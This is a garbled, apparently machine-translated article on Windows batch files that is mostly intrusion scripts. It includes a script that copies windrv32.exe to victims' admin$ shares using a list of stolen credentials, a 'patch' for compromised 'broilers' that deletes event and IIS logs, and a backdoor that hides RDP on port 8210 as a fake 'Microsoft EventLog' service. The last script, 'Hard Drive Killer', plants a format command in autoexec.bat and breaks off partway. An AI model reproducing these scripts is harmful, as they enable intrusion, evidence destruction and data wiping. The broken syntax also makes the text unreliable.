What Is a BAT Keyboard?

The bat file is a batch file under dos. A batch file is a plain text file that contains one or more commands. It has a file extension of .bat or .cmd. Enter the name of the batch file at the command prompt, or double-click the batch file, and the system will call cmd.exe to run them one by one in the order in which the commands in the file appear. Use batch files (also known as batch programs or scripts) to simplify daily or repetitive tasks. Intruders often implement functions such as multi-tool combined intrusion, automatic intrusion, and result extraction by writing batch files ^[1] .

In the Explorer window, if you want to double-click an entry for a batch file name to edit it instead of running it, just change the "default" value of the HKEY_CLASSES_ROOT \ batfile \ shell right window key from "open" to " edit "to close the registry editor so that when you double-click the BAT file again, the edit dialog will pop up ^[2]

% ~ I-remove any quotes ("), expand% I

% ~ fI-expand% I to a fully qualified path name

% ~ dI-expand% I to only one drive letter

% ~ pI-expand% I to only one path

% ~ nI-expand% I to a file name only

% ~ xI-expand% I to only one

cut here then save as a batchfile (I call it main.bat)-@ echo off

@if "% 1" == "" goto usage

@for / f "tokens = 1,2,3 delims =" %% i in (victim.txt) do start call IPChack.bat %% i %% j %% k

@goto end

: Usage

@echo run this batch in dos modle.or just double-click it.

: End

cut here then save as a batchfile (I call it main.bat) cut here then save as a batchfile (I call it door.bat)

@net use \\% 1 \ ipc $% 3 / u: "% 2"

@if errorlevel 1 goto failed

@echo Trying to establish the IPC $ connection OK

@copy windrv32.exe \\% 1 \ admin $ \ system32 && if not errorlevel 1 echo IP% 1 USER% 2 PWD% 3 >> ko.txt

| Command

Usage: first command | second command [| third command ...]

Use the result of the first command as the parameter of the second command. Remember that this method is very common in Unix.

sample:

time /t>>D:\IP.log

netstat -n -p tcp | find ": 3389" >> D: \ IP.log

start Explorer

Can you see it? Used for

During the intrusion process, specific keys of the registry are often operated to achieve certain purposes, such as: to achieve hidden backdoors,

Delete the batch shared by default for win2k / xp system

cut here then save as .bat or .cmd file

@echo preparing to delete all the default shares. when ready pres any key.

@pause

@echo off

: Rem check parameters if null show usage.

if (% 1) == (} goto: Usage

: Rem code start.

echo.

echo

echo.

echo Now deleting all the default shares.

echo.

net share% 1 $ / delete

net share% 2 $ / delete

net share% 3 $ / delete

net share% 4 $ / delete

net share% 5 $ / delete

net share% 6 $ / delete

net share% 7 $ / delete

net share% 8 $ / delete

net share% 9 $ / delete

net stop Server

net start Server

echo.

echo All the shares have been deleted

echo.

echo

echo.

echo Now modify the registry to change the system default properties.

echo.

echo Now creating the registry file

echo Windows Registry Editor Version 5.00> c: \ delshare.reg

echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters] >> c: \ delshare.reg

echo "AutoShareWks" = dword: 00000000 >> c: \ delshare.reg

echo "AutoShareServer" = dword: 00000000 >> c: \ delshare.reg

echo Nowing using the registry file to chang the system default properties.

regedit /sc:\delshare.reg

echo Deleting the temprotarily files.

del c: \ delshare.reg

goto: END

: Usage

echo.

echo

echo.

echo A example for batch file

echo [Use batch file to change the sysytem share properties.]

echo.

echo Author: Ex4rch

echo.

echo Error: Not enough parameters

echo.

echo Please enter the share disk you wanna delete

echo.

echo For instance, to delete the default shares:

echo delshare cde ipc admin print

echo.

echo If the disklable is not as C: D: E:, please chang it youself.

echo.

echo example:

echo If locak disklable are C: D: E: X: Y: Z:, you should chang the command into:

echo delshare cdexyz ipc admin print

echo.

echo *** you can delete nine shares once in a useing ***

echo.

echo

goto: EOF

: END

echo.

echo

echo.

echo OK, delshare.bat has deleted all the share you assigned.

echo

echo.

echo

echo.

: EOF

echo end of the batch file

cut here then save as .bat or .cmd file

Fully reinforced system (patching broilers)

cut here then save as .bat or .cmd file

@echo Windows Registry Editor Version 5.00> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters] >> patch.dll

@echo "AutoShareServer" = dword: 00000000 >> patch.dll

@echo "AutoShareWks" = dword: 00000000 >> patch.dll

@REM [forbidden to share]

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa] >> patch.dll

@echo "restrictanonymous" = dword: 00000001 >> patch.dll

@REM [Forbid anonymous login]

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ NetBT \ Parameters] >> patch.dll

@echo "SMBDeviceEnabled" = dword: 00000000 >> patch.dll

@REM [Prohibition and file access and print sharing]

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ @REMoteRegistry] >> patch.dll

@echo "Start" = dword: 00000004 >> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Schedule] >> patch.dll

@echo "Start" = dword: 00000004 >> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon] >> patch.dll

@echo "ShutdownWithoutLogon" = "0" >> patch.dll

@REM [Prohibit shutdown before login]

@echo "DontDisplayLastUserName" = "1" >> patch.dll

@REM [Suppress the previous login user name]

@regedit / s patch.dll

cut here then save as .bat or .cmd file

The following command is to clear all logs of broilers, prohibit some dangerous services, and modify the terminnal service of broilers to leave the trail.

@regedit / s patch.dll

@net stop w3svc

@net stop event log

@del c: \ winnt \ system32 \ logfiles \ w3svc1 \ *. * / f / q

@del c: \ winnt \ system32 \ logfiles \ w3svc2 \ *. * / f / q

@del c: \ winnt \ system32 \ config \ *. event / f / q

@del c: \ winnt \ system32dtclog \ *. * / f / q

@del c: \ winnt \ *. txt / f / q

@del c: \ winnt \ *. log / f / q

@net start w3svc

@net start event log

@rem [remove log]

@net stop lanmanserver / y

@net stop Schedule / y

@net stop RemoteRegistry / y

@del patch.dll

@echo The server has been patched, Have fun.

@del patch.bat

@REM [Prohibit some dangerous services. ]

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Termina l Server \ WinStations \ RDP-Tcp] >> patch.dll

@echo "PortNumber" = dword: 00002010 >> patch.dll

@echo "PortNumber" = dword: 00002012 >> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermDD] >> patch.dll

@echo "Start" = dword: 00000002 >> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SecuService] >> patch.dll

@echo "Start" = dword: 00000002 >> patch.dll

@echo "ErrorControl" = dword: 00000001 >> patch.dll

@echo "ImagePath" = hex: 25,00,53,00,79,00,73,00,74,00,65,00,6d, 00,52,00,6f, 00,6f, 00, \> > patch.dll

@echo 74,00,25,00,5c, 00,53,00,79,00,73,00,74,00,65,00,6d, 00,33,00,32,00,5c, 00, 65, \ >> patch.dll

@echo 00,76,00,65,00,6e, 00,74,00,6c, 00,6f, 00,67,00,2e, 00,65,00,78,00,65,00,00, 00 >> patch.dll

@echo "ObjectName" = "LocalSystem" >> patch.dll

@echo "Type" = dword: 00000010 >> patch.dll

@echo "Description" = "Keep record of the program and windows message." >> patch.dll

@echo "DisplayName" = "Microsoft EventLog" >> patch.dll

@echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ termservice] >> patch.dll

@echo "Start" = dword: 00000004 >> patch.dll

@copy c: \ winnt \ system32 \ termsrv.exec: \ winnt \ system32 \ eventlog.exe

@REM [Modify the 3389 connection, the port is 8210 (hexadecimal is 00002012), the name is Microsoft EventLog, leave a trail]

Hard Drive Killer Pro Version 4.0

(Playing batches to this level is really not easy.)

cut here then save as .bat or .cmd file

@echo off

rem This program is dedecated to a very special person that does not want to be named.

: start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS...

call attrib -r -hc: \ autoexec.bat> nul

echo @echo off> c: \ autoexec.bat

echo call format c: / q / u / autoSample> nul >> c: \ autoexec.bat

call attrib + r + hc: \ autoexec.bat> nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive =

set alldrive = cdefghijklmnopqrstuvw xyz

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, dont worry about how it

rem works, its d \ * amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off> drivechk.bat

echo @prompt %%%% comspec %%%% / f / c vol %%%% 1: $ b find "Vol"> nul> {t} .bat

% comspec% / e: 2048 / c {t} .bat >> drivechk.bat

del {t} .bat

echo if errorlevel 1 goto enddc >> drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS...

rem When errorlevel is 1, then the above is not true, if 0, then its true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%% comspec %%%% / f / c dir %%%% 1:. \ / ad / w / -p $ b find "bytes"> nul> {t} .bat

% comspec% / e: 2048 / c {t} .bat >> drivechk.bat

del {t} .bat

echo if errorlevel 1 goto enddc >> drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS...

rem if errorlevel is 1, then the drive specified is a removable media drive-not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%% 1:. \ / ad / w / -p $ b find "0 bytes free"> nul> {t} .bat

% comspec% / e: 2048 / c {t} .bat >> drivechk.bat

del {t} .bat

echo if errorlevel 1 set drive = %% drive %% %% 1 >> drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS...

rem if its errorlevel 1, then the specified drive is a hard or floppy drive.

rem if its not errorlevel 1, then the specified drive is aCD-ROMdrive.

echo: enddc >> drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

: Sampledrv

for %% a in (% alldrive%) do call drivechk.bat %% a> nul

del drivechk.bat> nul

if% drive. ==. set drive = c

: form_del

call attrib -r -hc: \ autoexec.bat> nul

echo @echo off> c: \ autoexec.bat